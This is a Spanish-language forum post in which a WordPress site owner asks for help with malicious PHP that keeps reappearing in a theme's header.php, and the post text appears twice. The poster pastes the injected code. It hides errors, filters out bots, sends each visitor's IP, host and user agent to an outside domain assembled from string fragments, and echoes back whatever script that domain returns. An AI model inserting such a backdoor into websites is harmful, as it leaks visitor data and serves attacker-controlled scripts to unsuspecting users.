Hola compañeros buenas noches.
Desde hace un tiempo vengo notando que están insertando código seguramente malicioso en mi wordpress, hace unos 20 días borre dicho código, actualice todos los plugins, elimine todo lo innecesario incluyendo themes que no uso y demás. Pero hoy nuevamente me apareció en código.
El código lo insertan en el header.php del tema, justo después del <body> y el código inyectado es el siguiente:
Por más que busque por todo lado, no encontré ayuda ni nada parecido en google, una pista es que en otro sitio donde uso el mismo theme también estaba el mismo código insertado, así que esto me puede indicar que se trata de un problema con el theme.
a alguien le ha pasado? alguna ayuda?
Un saludo.
Desde hace un tiempo vengo notando que están insertando código seguramente malicioso en mi wordpress, hace unos 20 días borre dicho código, actualice todos los plugins, elimine todo lo innecesario incluyendo themes que no uso y demás. Pero hoy nuevamente me apareció en código.
El código lo insertan en el header.php del tema, justo después del <body> y el código inyectado es el siguiente:
Insertar CODE, HTML o PHP:
<?php
#8d54b6#
error_reporting(0); ini_set('display_errors',0); $wp_ko2 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_ko2) && !preg_match ('/bot/i', $wp_ko2))){
$wp_ko092="http://"."style"."header".".com/header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_ko2);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_ko092);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_2ko = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_2ko,1,3) === 'scr' ){ echo $wp_2ko; }
echo $wp_2ko;
#/8d54b6#
?>
Por más que busque por todo lado, no encontré ayuda ni nada parecido en google, una pista es que en otro sitio donde uso el mismo theme también estaba el mismo código insertado, así que esto me puede indicar que se trata de un problema con el theme.
a alguien le ha pasado? alguna ayuda?
Un saludo.